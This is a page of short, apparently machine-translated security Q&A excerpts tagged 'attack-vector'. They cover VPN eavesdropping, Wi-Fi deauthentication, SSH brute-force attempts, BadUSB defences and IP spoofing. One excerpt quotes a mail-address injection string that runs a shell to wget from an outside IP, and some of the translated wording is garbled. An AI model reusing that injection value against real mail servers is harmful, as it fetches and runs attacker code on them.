attack-vector
知道受害者 VPN 登录凭证的攻击者是否能轻易窃听受 VPN 保护的互联网流量?
我指的是商业 VPN 提供商,例如 NordVPN 攻击者要有多老练? ...
attack-vector
attack-vector
这是否可能是一次 Wi-Fi 取消认证攻击?
最近,我们在某个频段的 Wi-Fi 连接非常糟糕。无论我选择什么设置,在重置后,以及使用各种新旧 Wi-Fi 路由器固件后,我们的连接速度仍然非常非常慢。 也尝试了 WireShark,得到了大量的 TCP 重传和 TCP 虚假重传数据包。 但当我使用 MAC 过滤器并将我们自己的设备列入白名单时,连接就好多了。尽管我们仍然收到“deauth”日志消息。 下面是来自我们 RT-AX92U 路由器的系统日志的片段,现在再次运行最新固件。或者实际上有两个路由器在 AiMesh 模式下运行。 5GHz-2(两个路由器之间通信的“回程”)存在该问题。 还尝...
attack-vector
有没有办法要求输入密码才能访问注册表编辑器(regedit)?
到防范 BadUSB 按键注入攻击,这似乎是合乎逻辑的需要密码才能以管理员权限访问命令行可以通过修改以下注册表项的“值数据”来实现1: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin 据记载: “当操作需要提升权限时,此选项会提示同意管理员输入其用户名和密码(或其他有效管理员)。此操作在安全桌面上进行” 这将防止通过命令行进行任何未经授权的系统修改。 但是,注册表编辑器本身不需要任何密码来访...
attack-vector
通过加号电子邮件地址后的可执行行进行攻击
我运营着自己的邮件服务器,时不时有人会向 root 帐户发送垃圾邮件或神秘邮件。最近,我收到了一封空邮件,收件人是: root+${运行{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@我的域名.tld 该字符串中的第二个 IP 地址似乎属于我租用服务器的同一托管服务。跑步和获得在我看来非常可疑,但我在互联网上没有发现任何有关此类攻击的信息。 根据服务器的邮件日志,该邮件是从 148.72.206.111 发送的。然而,从字段设置为[电子邮件保护]。 有人知道这是...
attack-vector
当一堆机器不断尝试通过 SSH 接入我的机器时,我该怎么办?
在过去的几个小时里,一些来自中国的机器(好吧,据说)一直试图以 root 身份通过 SSH 进入我的机器,但失败了。其中一些(全部?)IP 如下: 218.65.30.53 221.194.47.221 115.238.245.2 115.238.245.4 221.194.47.239 我使用基于 Web 的 whois 来检查它们,并已向滥用报告地址写信。我应该做什么?在我的机器上和一般情况下? ...
attack-vector
如何防止数百万次登录失败?
每次我使用 PuTTY 访问我的 VPS 时,都会看到以下内容: Last failed login: Fri Oct 6 17:25:58 UTC 2017 from xx.xxx.xxx.xxx on ssh:notty There were 2381935 failed login attempts since the last successful login. Last login: Tue Sep 26 09:30:02 2017 from xx.xxx.xxx.xxx 我不知道这是否相关,但是当我登录时,需要更多时间来加载,在其他没有像...
attack-vector
我需要伪造数据包的源 IP
我正在为一个安全项目运行一些测试,以下是场景。我有一个 SIP 服务器 (SBC),它接受来自 IP 地址列表的呼叫。我有一个 SIP INVITE 数据包,我想使用伪造的源 IP 地址将其发送到该服务器。我运行 wireshark 并发现我发送正确,但我的路由器将我伪造的源 IP 更改为公共 IP 地址,我找不到绕过此问题的方法。我不关心数据包从哪里发送,也不关心是否收到任何回复。我只想知道如何使用我选择的这个伪造 IP 地址将此数据包发送到目的地。请帮忙! ...
attack-vector
我无法识别外国 ssh 登录
上次 ssh 登录我的服务器似乎是从一台我不认识的计算机进行的。我怎么才能知道那是谁?aaubervilliers-651-1-60-191.w83-200.abo.wanadoo.fr 我不在法国! ...
